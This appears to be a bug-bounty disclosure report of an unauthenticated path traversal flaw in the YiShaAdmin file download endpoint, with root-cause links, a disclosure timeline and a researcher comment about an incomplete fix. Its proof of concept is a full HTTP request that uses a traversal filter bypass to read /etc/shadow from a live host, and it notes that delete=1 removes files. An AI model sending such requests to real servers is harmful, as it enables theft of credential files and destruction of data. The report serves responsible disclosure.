Path Traversal in liukuo362573/yishaadmin

Valid

Reported on

Feb 8th 2022


Description

https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete.

Proof of Concept

  • using BurpSuite and call this request
GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/shadow&delete=0 HTTP/1.1
Host: 106.14.124.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
  • /etc/passwd file: https://drive.google.com/file/d/1OL21JE17-Q4s3a5pi4fl4W_gGOk0Vvj1/view?usp=sharing
  • /etc/shadow file: https://drive.google.com/file/d/1giBmWLsVUCjejU-fN0IgJmtjShqaJ8q4/view?usp=sharing
  • Disclose internal path when file doesn't exist: https://drive.google.com/file/d/1hJckqVgvXbey67hUmVUafMhXvZFqCbEf/view?usp=sharing

Root-cause

Access without authentication:

  • https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.Web/Controllers/FileController.cs#L36
  • https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.WebApi/Controllers/FileController.cs#L39

Path traversal Vuln:

https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186

Delete File:

Attacker can set delete=1 to delete file (file demo_1.jpg has been deleted). https://github.com/liukuo362573/YiShaAdmin/tree/master/YiSha.Util/YiSha.Util/FileHelper.cs#L190

Impact

Unauthenticated user can read or delete arbitrary file on server.

We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. 4 months ago
nhiephon modified the report
4 months ago
nhiephon modified the report
4 months ago
nhiephon modified the report
4 months ago
nhiephon modified the report
4 months ago
nhiephon modified the report
4 months ago
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back 4 months ago
liukuo362573 validated this vulnerability 3 months ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
liukuo362573 confirmed that a fix has been merged on 025b06 3 months ago
The fix bounty has been dropped
nhiephon
3 months ago

Researcher


Hi maintainer,

I think you gave the incorrect patch. You also need to authorize filter the API located at https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.WebApi/Controllers/FileController.cs#L39 and https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.Web/Controllers/FileController.cs#L37. Unauthenticated user can't read arbitrary file but he can set delete=1 to delete any file in wwwroot and resource folder. I think only authenticated users are allowed to do that.

Regards.

to join this conversation